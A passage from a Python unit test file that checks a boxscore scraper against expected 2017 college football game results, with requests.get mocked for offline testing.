'winning_abbr': 'army',
'losing_name': 'Fordham',
'losing_abbr': 'Fordham'},
{'boxscore': '2017-09-01-colorado',
'away_name': 'Colorado State',
'away_abbr': 'colorado-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Colorado',
'home_abbr': 'colorado',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Colorado',
'winning_abbr': 'colorado',
'losing_name': 'Colorado State',
'losing_abbr': 'colorado-state'},
{'boxscore': '2017-09-01-eastern-michigan',
'away_name': 'Charlotte',
'away_abbr': 'charlotte',
'away_score': 7,
'away_rank': None,
'home_name': 'Eastern Michigan',
'home_abbr': 'eastern-michigan',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Eastern Michigan',
'winning_abbr': 'eastern-michigan',
'losing_name': 'Charlotte',
'losing_abbr': 'charlotte'},
{'boxscore': '2017-09-01-florida-atlantic',
'away_name': 'Navy',
'away_abbr': 'navy',
'away_score': 42,
'away_rank': None,
'home_name': 'Florida Atlantic',
'home_abbr': 'florida-atlantic',
'home_score': 19,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Navy',
'winning_abbr': 'navy',
'losing_name': 'Florida Atlantic',
'losing_abbr': 'florida-atlantic'},
{'boxscore': '2017-09-01-northern-illinois',
'away_name': 'Boston College',
'away_abbr': 'boston-college',
'away_score': 23,
'away_rank': None,
'home_name': 'Northern Illinois',
'home_abbr': 'northern-illinois',
'home_score': 20,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boston College',
'winning_abbr': 'boston-college',
'losing_name': 'Northern Illinois',
'losing_abbr': 'northern-illinois'},
{'boxscore': '2017-09-01-rutgers',
'away_name': 'Washington',
'away_abbr': 'washington',
'away_score': 30,
'away_rank': 8,
'home_name': 'Rutgers',
'home_abbr': 'rutgers',
'home_score': 14,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Washington',
'winning_abbr': 'washington',
'losing_name': 'Rutgers',
'losing_abbr': 'rutgers'},
{'boxscore': '2017-09-01-syracuse',
'away_name': 'Central Connecticut State',
'away_abbr': 'Central Connecticut State',
'away_score': 7,
'away_rank': None,
'home_name': 'Syracuse',
'home_abbr': 'syracuse',
'home_score': 50,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Syracuse',
'winning_abbr': 'syracuse',
'losing_name': 'Central Connecticut State',
'losing_abbr': 'Central Connecticut State'},
{'boxscore': '2017-09-01-wisconsin',
'away_name': 'Utah State',
'away_abbr': 'utah-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Wisconsin',
'home_abbr': 'wisconsin',
'home_score': 59,
'home_rank': 9,
'non_di': False,
'top_25': True,
'winning_name': 'Wisconsin',
'winning_abbr': 'wisconsin',
'losing_name': 'Utah State',
'losing_abbr': 'utah-state'},
{'boxscore': '2017-08-31-arizona-state',
'away_name': 'New Mexico State',
'away_abbr': 'new-mexico-state',
'away_score': 31,
'away_rank': None,
'home_name': 'Arizona State',
'home_abbr': 'arizona-state',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Arizona State',
'winning_abbr': 'arizona-state',
'losing_name': 'New Mexico State',
'losing_abbr': 'new-mexico-state'},
{'boxscore': '2017-08-31-arkansas',
'away_name': 'Florida A&M',
'away_abbr': 'Florida A&M',
'away_score': 7,
'away_rank': None,
'home_name': 'Arkansas',
'home_abbr': 'arkansas',
'home_score': 49,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Arkansas',
'winning_abbr': 'arkansas',
'losing_name': 'Florida A&M',
'losing_abbr': 'Florida A&M'},
{'boxscore': '2017-08-31-central-michigan',
'away_name': 'Rhode Island',
'away_abbr': 'Rhode Island',
'away_score': 27,
'away_rank': None,
'home_name': 'Central Michigan',
'home_abbr': 'central-michigan',
'home_score': 30,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Central Michigan',
'winning_abbr': 'central-michigan',
'losing_name': 'Rhode Island',
'losing_abbr': 'Rhode Island'},
{'boxscore': '2017-08-31-cincinnati',
'away_name': 'Austin Peay',
'away_abbr': 'Austin Peay',
'away_score': 14,
'away_rank': None,
'home_name': 'Cincinnati',
'home_abbr': 'cincinnati',
'home_score': 26,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Cincinnati',
'winning_abbr': 'cincinnati',
'losing_name': 'Austin Peay',
'losing_abbr': 'Austin Peay'},
{'boxscore': '2017-08-31-connecticut',
'away_name': 'Holy Cross',
'away_abbr': 'Holy Cross',
'away_score': 20,
'away_rank': None,
'home_name': 'Connecticut',
'home_abbr': 'connecticut',
'home_score': 27,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Connecticut',
'winning_abbr': 'connecticut',
'losing_name': 'Holy Cross',
'losing_abbr': 'Holy Cross'},
{'boxscore': '2017-08-31-georgia-state',
'away_name': 'Tennessee State',
'away_abbr': 'Tennessee State',
'away_score': 17,
'away_rank': None,
'home_name': 'Georgia State',
'home_abbr': 'georgia-state',
'home_score': 10,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Tennessee State',
'winning_abbr': 'Tennessee State',
'losing_name': 'Georgia State',
'losing_abbr': 'georgia-state'},
{'boxscore': '2017-08-31-idaho',
'away_name': 'Sacramento State',
'away_abbr': 'Sacramento State',
'away_score': 6,
'away_rank': None,
'home_name': 'Idaho',
'home_abbr': 'idaho',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Idaho',
'winning_abbr': 'idaho',
'losing_name': 'Sacramento State',
'losing_abbr': 'Sacramento State'},
{'boxscore': '2017-08-31-indiana',
'away_name': 'Ohio State',
'away_abbr': 'ohio-state',
'away_score': 49,
'away_rank': 2,
'home_name': 'Indiana',
'home_abbr': 'indiana',
'home_score': 21,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Ohio State',
'winning_abbr': 'ohio-state',
'losing_name': 'Indiana',
'losing_abbr': 'indiana'},
{'boxscore': '2017-08-31-memphis',
'away_name': 'Louisiana-Monroe',
'away_abbr': 'louisiana-monroe',
'away_score': 29,
'away_rank': None,
'home_name': 'Memphis',
'home_abbr': 'memphis',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Memphis',
'winning_abbr': 'memphis',
'losing_name': 'Louisiana-Monroe',
'losing_abbr': 'louisiana-monroe'},
{'boxscore': '2017-08-31-minnesota',
'away_name': 'Buffalo',
'away_abbr': 'buffalo',
'away_score': 7,
'away_rank': None,
'home_name': 'Minnesota',
'home_abbr': 'minnesota',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Minnesota',
'winning_abbr': 'minnesota',
'losing_name': 'Buffalo',
'losing_abbr': 'buffalo'},
{'boxscore': '2017-08-31-toledo',
'away_name': 'Elon',
'away_abbr': 'Elon',
'away_score': 13,
'away_rank': None,
'home_name': 'Toledo',
'home_abbr': 'toledo',
'home_score': 47,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Toledo',
'winning_abbr': 'toledo',
'losing_name': 'Elon',
'losing_abbr': 'Elon'},
{'boxscore': '2017-08-31-utah',
'away_name': 'North Dakota',
'away_abbr': 'North Dakota',
'away_score': 16,
'away_rank': None,
'home_name': 'Utah',
'home_abbr': 'utah',
'home_score': 37,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Utah',
'winning_abbr': 'utah',
'losing_name': 'North Dakota',
'losing_abbr': 'North Dakota'},
{'boxscore': '2017-08-31-wake-forest',
'away_name': 'Presbyterian',
'away_abbr': 'Presbyterian',
'away_score': 7,
'away_rank': None,
'home_name': 'Wake Forest',
'home_abbr': 'wake-forest',
'home_score': 51,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Wake Forest',
'winning_abbr': 'wake-forest',
'losing_name': 'Presbyterian',
'losing_abbr': 'Presbyterian'}
]
}
@mock.patch('requests.get', side_effect=mock_pyquery)
def test_boxscores_search(self, *args, **kwargs):
result = Boxscores(datetime(2017, 8, 30)).games
assert result == self.expected
@mock.patch('requests.get', side_effect=mock_pyquery)
def test_boxscores_search_invalid_end(self, *args, **kwargs):
result = Boxscores(datetime(2017, 8, 30), datetime(2017, 8, 29)).games
assert result == self.expected
@mock.patch('requests.get', side_effect=mock_pyquery)
def test_boxscores_search_multiple_days(self, *args, **kwargs):
expected = {
'8-30-2017': [
{'boxscore': '2017-09-04-georgia-tech',
'away_name': 'Tennessee',
'away_abbr': 'tennessee',
'away_score': 42,
'away_rank': 25,
'home_name': 'Georgia Tech',
'home_abbr': 'georgia-tech',
'home_score': 41,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Tennessee',
'winning_abbr': 'tennessee',
'losing_name': 'Georgia Tech',
'losing_abbr': 'georgia-tech'},
{'boxscore': '2017-09-03-ucla',
'away_name': 'Texas A&M',
'away_abbr': 'texas-am',
'away_score': 44,
'away_rank': None,
'home_name': 'UCLA',
'home_abbr': 'ucla',
'home_score': 45,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCLA',
'winning_abbr': 'ucla',
'losing_name': 'Texas A&M',
'losing_abbr': 'texas-am'},
{'boxscore': '2017-09-03-virginia-tech',
'away_name': 'West Virginia',
'away_abbr': 'west-virginia',
'away_score': 24,
'away_rank': 22,
'home_name': 'Virginia Tech',
'home_abbr': 'virginia-tech',
'home_score': 31,
'home_rank': 21,
'non_di': False,
'top_25': True,
'winning_name': 'Virginia Tech',
'winning_abbr': 'virginia-tech',
'losing_name': 'West Virginia',
'losing_abbr': 'west-virginia'},
{'boxscore': '2017-09-02-air-force',
'away_name': 'Virginia Military Institute',
'away_abbr': 'Virginia Military Institute',
'away_score': 0,
'away_rank': None,
'home_name': 'Air Force',
'home_abbr': 'air-force',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-alabama-birmingham',
'away_name': 'Alabama A&M',
'away_abbr': 'Alabama A&M',
'away_score': 7,
'away_rank': None,
'home_name': 'UAB',
'home_abbr': 'alabama-birmingham',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'UAB',
'winning_abbr': 'alabama-birmingham',
'losing_name': 'Alabama A&M',
'losing_abbr': 'Alabama A&M'},
{'boxscore': '2017-09-02-arizona',
'away_name': 'Northern Arizona',
'away_abbr': 'Northern Arizona',
'away_score': 24,
'away_rank': None,
'home_name': 'Arizona',
'home_abbr': 'arizona',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Arizona',
'winning_abbr': 'arizona',
'losing_name': 'Northern Arizona',
'losing_abbr': 'Northern Arizona'},
{'boxscore': '2017-09-02-auburn',
'away_name': 'Georgia Southern',
'away_abbr': 'georgia-southern',
'away_score': 7,
'away_rank': None,
'home_name': 'Auburn',
'home_abbr': 'auburn',
'home_score': 41,
'home_rank': 12,
'non_di': False,
'top_25': True,
'winning_name': 'Auburn',
'winning_abbr': 'auburn',
'losing_name': 'Georgia Southern',
'losing_abbr': 'georgia-southern'},
{'boxscore': '2017-09-02-baylor',
'away_name': 'Liberty',
'away_abbr': 'Liberty',
'away_score': 48,
'away_rank': None,
'home_name': 'Baylor',
'home_abbr': 'baylor',
'home_score': 45,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Liberty',
'winning_abbr': 'Liberty',
'losing_name': 'Baylor',
'losing_abbr': 'baylor'},
{'boxscore': '2017-09-02-boise-state',
'away_name': 'Troy',
'away_abbr': 'troy',
'away_score': 13,
'away_rank': None,
'home_name': 'Boise State',
'home_abbr': 'boise-state',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boise State',
'winning_abbr': 'boise-state',
'losing_name': 'Troy',
'losing_abbr': 'troy'},
{'boxscore': '2017-09-02-brigham-young',
'away_name': 'LSU',
'away_abbr': 'louisiana-state',
'away_score': 27,
'away_rank': 13,
'home_name': 'Brigham Young',
'home_abbr': 'brigham-young',
'home_score': 0,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-central-florida',
'away_name': 'Florida International',
'away_abbr': 'florida-international',
'away_score': 17,
'away_rank': None,
'home_name': 'UCF',
'home_abbr': 'central-florida',
'home_score': 61,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCF',
'winning_abbr': 'central-florida',
'losing_name': 'Florida International',
'losing_abbr': 'florida-international'},
{'boxscore': '2017-09-02-clemson',
'away_name': 'Kent State',
'away_abbr': 'kent-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Clemson',
'home_abbr': 'clemson',
'home_score': 56,
'home_rank': 5,
'non_di': False,
'top_25': True,
'winning_name': 'Clemson',
'winning_abbr': 'clemson',
'losing_name': 'Kent State',
'losing_abbr': 'kent-state'},
{'boxscore': '2017-09-02-coastal-carolina',
'away_name': 'Massachusetts',
'away_abbr': 'massachusetts',
'away_score': 28,
'away_rank': None,
'home_name': 'Coastal Carolina',
'home_abbr': 'coastal-carolina',
'home_score': 38,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Coastal Carolina',
'winning_abbr': 'coastal-carolina',
'losing_name': 'Massachusetts',
'losing_abbr': 'massachusetts'},
{'boxscore': '2017-09-02-duke',
'away_name': 'North Carolina Central',
'away_abbr': 'North Carolina Central',
'away_score': 7,
'away_rank': None,
'home_name': 'Duke',
'home_abbr': 'duke',
'home_score': 60,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Duke',
'winning_abbr': 'duke',
'losing_name': 'North Carolina Central',
'losing_abbr': 'North Carolina Central'},
{'boxscore': '2017-09-02-east-carolina',
'away_name': 'James Madison',
'away_abbr': 'James Madison',
'away_score': 34,
'away_rank': None,
'home_name': 'East Carolina',
'home_abbr': 'east-carolina',
'home_score': 14,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'James Madison',
'winning_abbr': 'James Madison',
'losing_name': 'East Carolina',
'losing_abbr': 'east-carolina'},
{'boxscore': '2017-09-02-florida-state',
'away_name': 'Alabama',
'away_abbr': 'alabama',
'away_score': 24,
'away_rank': 1,
'home_name': 'Florida State',
'home_abbr': 'florida-state',
'home_score': 7,
'home_rank': 3,
'non_di': False,
'top_25': True,
'winning_name': 'Alabama',
'winning_abbr': 'alabama',
'losing_name': 'Florida State',
'losing_abbr': 'florida-state'},
{'boxscore': '2017-09-02-fresno-state',
'away_name': 'Incarnate Word',
'away_abbr': 'Incarnate Word',
'away_score': 0,
'away_rank': None,
'home_name': 'Fresno State',
'home_abbr': 'fresno-state',
'home_score': 66,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-georgia',
'away_name': 'Appalachian State',
'away_abbr': 'appalachian-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Georgia',
'home_abbr': 'georgia',
'home_score': 31,
'home_rank': 15,
'non_di': False,
'top_25': True,
'winning_name': 'Georgia',
'winning_abbr': 'georgia',
'losing_name': 'Appalachian State',
'losing_abbr': 'appalachian-state'},
{'boxscore': '2017-09-02-hawaii',
'away_name': 'Western Carolina',
'away_abbr': 'Western Carolina',
'away_score': 18,
'away_rank': None,
'home_name': 'Hawaii',
'home_abbr': 'hawaii',
'home_score': 41,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Hawaii',
'winning_abbr': 'hawaii',
'losing_name': 'Western Carolina',
'losing_abbr': 'Western Carolina'},
{'boxscore': '2017-09-02-illinois',
'away_name': 'Ball State',
'away_abbr': 'ball-state',
'away_score': 21,
'away_rank': None,
'home_name': 'Illinois',
'home_abbr': 'illinois',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Illinois',
'winning_abbr': 'illinois',
'losing_name': 'Ball State',
'losing_abbr': 'ball-state'},
{'boxscore': '2017-09-02-iowa',
'away_name': 'Wyoming',
'away_abbr': 'wyoming',
'away_score': 3,
'away_rank': None,
'home_name': 'Iowa',
'home_abbr': 'iowa',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Iowa',
'winning_abbr': 'iowa',
'losing_name': 'Wyoming',
'losing_abbr': 'wyoming'},
{'boxscore': '2017-09-02-iowa-state',
'away_name': 'Northern Iowa',
'away_abbr': 'Northern Iowa',
'away_score': 24,
'away_rank': None,
'home_name': 'Iowa State',
'home_abbr': 'iowa-state',
'home_score': 42,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Iowa State',
'winning_abbr': 'iowa-state',
'losing_name': 'Northern Iowa',
'losing_abbr': 'Northern Iowa'},
{'boxscore': '2017-09-02-kansas',
'away_name': 'Southeast Missouri State',
'away_abbr': 'Southeast Missouri State',
'away_score': 16,
'away_rank': None,
'home_name': 'Kansas',
'home_abbr': 'kansas',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Kansas',
'winning_abbr': 'kansas',
'losing_name': 'Southeast Missouri State',
'losing_abbr': 'Southeast Missouri State'},
{'boxscore': '2017-09-02-kansas-state',
'away_name': 'Central Arkansas',
'away_abbr': 'Central Arkansas',
'away_score': 19,
'away_rank': None,
'home_name': 'Kansas State',
'home_abbr': 'kansas-state',
'home_score': 55,
'home_rank': 20,
'non_di': True,
'top_25': True,
'winning_name': 'Kansas State',
'winning_abbr': 'kansas-state',
'losing_name': 'Central Arkansas',
'losing_abbr': 'Central Arkansas'},
{'boxscore': '2017-09-02-louisiana-lafayette',
'away_name': 'Southeastern Louisiana',
'away_abbr': 'Southeastern Louisiana',
'away_score': 48,
'away_rank': None,
'home_name': 'Louisiana',
'home_abbr': 'louisiana-lafayette',
'home_score': 51,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana',
'winning_abbr': 'louisiana-lafayette',
'losing_name': 'Southeastern Louisiana',
'losing_abbr': 'Southeastern Louisiana'},
{'boxscore': '2017-09-02-louisiana-tech',
'away_name': 'Northwestern State',
'away_abbr': 'Northwestern State',
'away_score': 24,
'away_rank': None,
'home_name': 'Louisiana Tech',
'home_abbr': 'louisiana-tech',
'home_score': 52,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana Tech',
'winning_abbr': 'louisiana-tech',
'losing_name': 'Northwestern State',
'losing_abbr': 'Northwestern State'},
{'boxscore': '2017-09-02-marshall',
'away_name': 'Miami (OH)',
'away_abbr': 'miami-oh',
'away_score': 26,
'away_rank': None,
'home_name': 'Marshall',
'home_abbr': 'marshall',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Marshall',
'winning_abbr': 'marshall',
'losing_name': 'Miami (OH)',
'losing_abbr': 'miami-oh'},
{'boxscore': '2017-09-02-miami-fl',
'away_name': 'Bethune-Cookman',
'away_abbr': 'Bethune-Cookman',
'away_score': 13,
'away_rank': None,
'home_name': 'Miami (FL)',
'home_abbr': 'miami-fl',
'home_score': 41,
'home_rank': 18,
'non_di': True,
'top_25': True,
'winning_name': 'Miami (FL)',
'winning_abbr': 'miami-fl',
'losing_name': 'Bethune-Cookman',
'losing_abbr': 'Bethune-Cookman'},
{'boxscore': '2017-09-02-michigan',
'away_name': 'Florida',
'away_abbr': 'florida',
'away_score': 17,
'away_rank': 17,
'home_name': 'Michigan',
'home_abbr': 'michigan',
'home_score': 33,
'home_rank': 11,
'non_di': False,
'top_25': True,
'winning_name': 'Michigan',
'winning_abbr': 'michigan',
'losing_name': 'Florida',
'losing_abbr': 'florida'},
{'boxscore': '2017-09-02-michigan-state',
'away_name': 'Bowling Green State',
'away_abbr': 'bowling-green-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Michigan State',
'home_abbr': 'michigan-state',
'home_score': 35,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Michigan State',
'winning_abbr': 'michigan-state',
'losing_name': 'Bowling Green State',
'losing_abbr': 'bowling-green-state'},
{'boxscore': '2017-09-02-middle-tennessee-state',
'away_name': 'Vanderbilt',
'away_abbr': 'vanderbilt',
'away_score': 28,
'away_rank': None,
'home_name': 'Middle Tennessee State',
'home_abbr': 'middle-tennessee-state',
'home_score': 6,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Vanderbilt',
'winning_abbr': 'vanderbilt',
'losing_name': 'Middle Tennessee State',
'losing_abbr': 'middle-tennessee-state'},
{'boxscore': '2017-09-02-mississippi',
'away_name': 'South Alabama',
'away_abbr': 'south-alabama',
'away_score': 27,
'away_rank': None,
'home_name': 'Ole Miss',
'home_abbr': 'mississippi',
'home_score': 47,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Ole Miss',
'winning_abbr': 'mississippi',
'losing_name': 'South Alabama',
'losing_abbr': 'south-alabama'},
{'boxscore': '2017-09-02-mississippi-state',
'away_name': 'Charleston Southern',
'away_abbr': 'Charleston Southern',
'away_score': 0,
'away_rank': None,
'home_name': 'Mississippi State',
'home_abbr': 'mississippi-state',
'home_score': 49,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-missouri',
'away_name': 'Missouri State',
'away_abbr': 'Missouri State',
'away_score': 43,
'away_rank': None,
'home_name': 'Missouri',
'home_abbr': 'missouri',
'home_score': 72,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Missouri',
'winning_abbr': 'missouri',
'losing_name': 'Missouri State',
'losing_abbr': 'Missouri State'},
{'boxscore': '2017-09-02-nebraska',
'away_name': 'Arkansas State',
'away_abbr': 'arkansas-state',
'away_score': 36,
'away_rank': None,
'home_name': 'Nebraska',
'home_abbr': 'nebraska',
'home_score': 43,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Nebraska',
'winning_abbr': 'nebraska',
'losing_name': 'Arkansas State',
'losing_abbr': 'arkansas-state'},
{'boxscore': '2017-09-02-nevada-las-vegas',
'away_name': 'Howard',
'away_abbr': 'Howard',
'away_score': 43,
'away_rank': None,
'home_name': 'UNLV',
'home_abbr': 'nevada-las-vegas',
'home_score': 40,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Howard',
'winning_abbr': 'Howard',
'losing_name': 'UNLV',
'losing_abbr': 'nevada-las-vegas'},
{'boxscore': '2017-09-02-new-mexico',
'away_name': 'Abilene Christian',
'away_abbr': 'Abilene Christian',
'away_score': 14,
'away_rank': None,
'home_name': 'New Mexico',
'home_abbr': 'new-mexico',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'New Mexico',
'winning_abbr': 'new-mexico',
'losing_name': 'Abilene Christian',
'losing_abbr': 'Abilene Christian'},
{'boxscore': '2017-09-02-north-carolina',
'away_name': 'California',
'away_abbr': 'california',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina',
'home_abbr': 'north-carolina',
'home_score': 30,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'California',
'winning_abbr': 'california',
'losing_name': 'North Carolina',
'losing_abbr': 'north-carolina'},
{'boxscore': '2017-09-02-north-carolina-state',
'away_name': 'South Carolina',
'away_abbr': 'south-carolina',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina State',
'home_abbr': 'north-carolina-state',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'South Carolina',
'winning_abbr': 'south-carolina',
'losing_name': 'North Carolina State',
'losing_abbr': 'north-carolina-state'},
{'boxscore': '2017-09-02-north-texas',
'away_name': 'Lamar',
'away_abbr': 'Lamar',
'away_score': 14,
'away_rank': None,
'home_name': 'North Texas',
'home_abbr': 'north-texas',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'North Texas',
'winning_abbr': 'north-texas',
'losing_name': 'Lamar',
'losing_abbr': 'Lamar'},
{'boxscore': '2017-09-02-northwestern',
'away_name': 'Nevada',
'away_abbr': 'nevada',
'away_score': 20,
'away_rank': None,
'home_name': 'Northwestern',
'home_abbr': 'northwestern',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Northwestern',
'winning_abbr': 'northwestern',
'losing_name': 'Nevada',
'losing_abbr': 'nevada'},
{'boxscore': '2017-09-02-notre-dame',
'away_name': 'Temple',
'away_abbr': 'temple',
'away_score': 16,
'away_rank': None,
'home_name': 'Notre Dame',
'home_abbr': 'notre-dame',
'home_score': 49,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Notre Dame',
'winning_abbr': 'notre-dame',
'losing_name': 'Temple',
'losing_abbr': 'temple'},
{'boxscore': '2017-09-02-ohio',
'away_name': 'Hampton',
'away_abbr': 'Hampton',
'away_score': 0,
'away_rank': None,
'home_name': 'Ohio',
'home_abbr': 'ohio',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-oklahoma',
'away_name': 'UTEP',
'away_abbr': 'texas-el-paso',
'away_score': 7,
'away_rank': None,
'home_name': 'Oklahoma',
'home_abbr': 'oklahoma',
'home_score': 56,
'home_rank': 7,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma',
'winning_abbr': 'oklahoma',
'losing_name': 'UTEP',
'losing_abbr': 'texas-el-paso'},
{'boxscore': '2017-09-02-oklahoma-state',
'away_name': 'Tulsa',
'away_abbr': 'tulsa',
'away_score': 24,
'away_rank': None,
'home_name': 'Oklahoma State',
'home_abbr': 'oklahoma-state',
'home_score': 59,
'home_rank': 10,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma State',
'winning_abbr': 'oklahoma-state',
'losing_name': 'Tulsa',
'losing_abbr': 'tulsa'},
{'boxscore': '2017-09-02-old-dominion',
'away_name': 'Albany',
'away_abbr': 'Albany',
'away_score': 17,
'away_rank': None,
'home_name': 'Old Dominion',
'home_abbr': 'old-dominion',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Old Dominion',
'winning_abbr': 'old-dominion',
'losing_name': 'Albany',
'losing_abbr': 'Albany'},
{'boxscore': '2017-09-02-oregon',
'away_name': 'Southern Utah',
'away_abbr': 'Southern Utah',
'away_score': 21,
'away_rank': None,
'home_name': 'Oregon',
'home_abbr': 'oregon',
'home_score': 77,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon',
'winning_abbr': 'oregon',
'losing_name': 'Southern Utah',
'losing_abbr': 'Southern Utah'},
{'boxscore': '2017-09-02-oregon-state',
'away_name': 'Portland State',
'away_abbr': 'Portland State',
'away_score': 32,
'away_rank': None,
'home_name': 'Oregon State',
'home_abbr': 'oregon-state',
'home_score': 35,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon State',
'winning_abbr': 'oregon-state',
'losing_name': 'Portland State',
'losing_abbr': 'Portland State'},
{'boxscore': '2017-09-02-penn-state',
'away_name': 'Akron',
'away_abbr': 'akron',
'away_score': 0,
'away_rank': None,
'home_name': 'Penn State',
'home_abbr': 'penn-state',
'home_score': 52,
'home_rank': 6,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-pittsburgh',
'away_name': 'Youngstown State',
'away_abbr': 'Youngstown State',
'away_score': 21,
'away_rank': None,
'home_name': 'Pitt',
'home_abbr': 'pittsburgh',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Pitt',
'winning_abbr': 'pittsburgh',
'losing_name': 'Youngstown State',
'losing_abbr': 'Youngstown State'},
{'boxscore': '2017-09-02-purdue',
'away_name': 'Louisville',
'away_abbr': 'louisville',
'away_score': 35,
'away_rank': 16,
'home_name': 'Purdue',
'home_abbr': 'purdue',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Louisville',
'winning_abbr': 'louisville',
'losing_name': 'Purdue',
'losing_abbr': 'purdue'},
{'boxscore': '2017-09-02-san-diego-state',
'away_name': 'California-Davis',
'away_abbr': 'California-Davis',
'away_score': 17,
'away_rank': None,
'home_name': 'San Diego State',
'home_abbr': 'san-diego-state',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Diego State',
'winning_abbr': 'san-diego-state',
'losing_name': 'California-Davis',
'losing_abbr': 'California-Davis'},
{'boxscore': '2017-09-02-san-jose-state',
'away_name': 'Cal Poly',
'away_abbr': 'Cal Poly',
'away_score': 13,
'away_rank': None,
'home_name': 'San Jose State',
'home_abbr': 'san-jose-state',
'home_score': 34,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Jose State',
'winning_abbr': 'san-jose-state',
'losing_name': 'Cal Poly',
'losing_abbr': 'Cal Poly'},
{'boxscore': '2017-09-02-south-florida',
'away_name': 'Stony Brook',
'away_abbr': 'Stony Brook',
'away_score': 17,
'away_rank': None,
'home_name': 'South Florida',
'home_abbr': 'south-florida',
'home_score': 31,
'home_rank': 19,
'non_di': True,
'top_25': True,
'winning_name': 'South Florida',
'winning_abbr': 'south-florida',
'losing_name': 'Stony Brook',
'losing_abbr': 'Stony Brook'},
{'boxscore': '2017-09-02-southern-california',
'away_name': 'Western Michigan',
'away_abbr': 'western-michigan',
'away_score': 31,
'away_rank': None,
'home_name': 'USC',
'home_abbr': 'southern-california',
'home_score': 49,
